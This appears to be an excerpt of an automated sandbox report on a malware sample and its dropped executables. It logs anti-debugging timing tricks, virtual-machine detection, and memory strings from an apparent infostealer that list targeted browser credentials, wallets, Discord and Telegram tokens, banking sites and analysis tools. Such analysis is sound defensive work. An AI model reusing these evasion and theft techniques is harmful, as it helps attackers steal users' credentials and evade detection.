Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70784 second address: 4C70795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7F816 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F7F4E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F8A8B8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 101CCC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11BF816 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11BF4E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11CA8B8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 125CCC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Special instruction interceptor: First address: 1640C8B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Special instruction interceptor: First address: 18724F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Special instruction interceptor: First address: 108AB4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016042001\2656cd82fe.exe	Special instruction interceptor: First address: 1239419 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Special instruction interceptor: First address: 1A7B1B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Special instruction interceptor: First address: 1A7A6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Special instruction interceptor: First address: 365D30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Special instruction interceptor: First address: 131A80B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Special instruction interceptor: First address: CDF6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Special instruction interceptor: First address: 271CCB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Special instruction interceptor: First address: 300E40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Special instruction interceptor: First address: D24B3 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 4C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 4F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 6F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 4A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 4C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Memory allocated: 4A90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Memory allocated: 5500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Memory allocated: 5500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe	Memory allocated: 7500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Memory allocated: 5130000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Memory allocated: 5370000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Memory allocated: 5130000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CD038E rdtsc

0_2_04CD038E

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1268	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1118	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1130	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1283	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 1143	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 776	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 2228	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 558	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 2399	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Window / User API: threadDelayed 594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016046001\5cbc6b58d3.exe	Window / User API: threadDelayed 909

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_7-11778

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2828	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2828	Thread sleep time: -108054s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2888	Thread sleep count: 1268 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2888	Thread sleep time: -2537268s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4956	Thread sleep count: 291 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4956	Thread sleep time: -8730000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3008	Thread sleep count: 1118 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3008	Thread sleep time: -2237118s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5256	Thread sleep count: 1130 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5256	Thread sleep time: -2261130s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5884	Thread sleep count: 1219 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5884	Thread sleep time: -2439219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6804	Thread sleep count: 1283 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6804	Thread sleep time: -2567283s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe TID: 4400	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 6208	Thread sleep count: 1143 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 6208	Thread sleep time: -2287143s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 4248	Thread sleep count: 776 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 4248	Thread sleep time: -1552776s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 5968	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 4668	Thread sleep count: 2228 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 4668	Thread sleep time: -4458228s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 1020	Thread sleep count: 558 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 1020	Thread sleep time: -1116558s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 1960	Thread sleep count: 2399 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 1960	Thread sleep time: -4800399s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 6696	Thread sleep count: 594 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 6696	Thread sleep time: -1188594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe TID: 6004	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6360	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 2320	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 3184	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6324	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 2624	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 4820	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7108	Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6368	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6716	Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6560	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 5328	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6788	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 6412	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7504	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7508	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7628	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7516	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe TID: 7524	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe TID: 2464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe TID: 8032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\8AU3DSUR7PD5E72PABBP65.exe TID: 3308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2604211P32LZMQXV6M.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File Volume queried: unknown FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004ED871 FindFirstFileExW,	7_2_004ED871
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 7_2_004ED922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_004ED922
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004ED871 FindFirstFileExW,	9_2_004ED871
Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe	Code function: 9_2_004ED922 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_004ED922

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\	Jump to behavior

Source: 95bf820dd4.exe, 0000000E.00000003.2901822680.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 12.1e411cf62bcba04d74fc6b505b9235404INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005676000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: ccdb824191.exe, 00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWs
Source: d1834e5726.exe, 0000000B.00000003.2697913020.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2698936483.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3060343417.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3246327776.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3220821695.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3322337180.00000000012D4000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3352890856.0000000001252000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3206485194.0000000001252000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000015.00000002.3230900745.0000000000902000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 00000027.00000002.3426751089.00000269D7AA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: chrome.exe, 00000010.00000002.3321764592.0000027730368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_p
Source: 5cbc6b58d3.exe, 00000018.00000003.3360040362.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 5cbc6b58d3.exe, 00000018.00000003.3358733569.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, 5cbc6b58d3.exe, 00000018.00000003.3361409338.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, 5cbc6b58d3.exe, 00000018.00000003.3363888436.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, 5cbc6b58d3.exe, 00000018.00000002.3367677299.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005676000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 00000027.00000002.3421610394.00000269CDED3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWmMD
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: file.exe, 00000000.00000002.2105854479.0000000000F64000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2130592348.00000000011A4000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2134845365.00000000011A4000.00000040.00000001.01000000.00000007.sdmp, 2656cd82fe.exe, 2656cd82fe.exe, 0000000D.00000002.2881432053.0000000001213000.00000040.00000001.01000000.0000000B.sdmp, cd39094ad6.exe, 00000015.00000002.3233860179.0000000001271000.00000040.00000001.01000000.00000015.sdmp, cd39094ad6.exe, 00000022.00000002.3395888761.0000000001271000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 00000010.00000002.3321764592.00000277303A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\S
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: chrome.exe, 00000010.00000002.3425377233.00000277348A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\dRom&Ven_NECVMWar&Prod_VMware_
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: cd39094ad6.exe, 00000022.00000002.3390011704.0000000000875000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>q
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000000.2057128164.0000000000F64000.00000080.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2106409856.0000000001006000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000000.2076873276.00000000011A4000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.2131252191.0000000001246000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000000.2085385234.00000000011A4000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2135595071.0000000001246000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2478736277.00000000011A4000.00000080.00000001.01000000.00000007.sdmp	Binary or memory string: %QemuP)
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: ccdb824191.exe, 00000017.00000003.3396569775.0000000005671000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
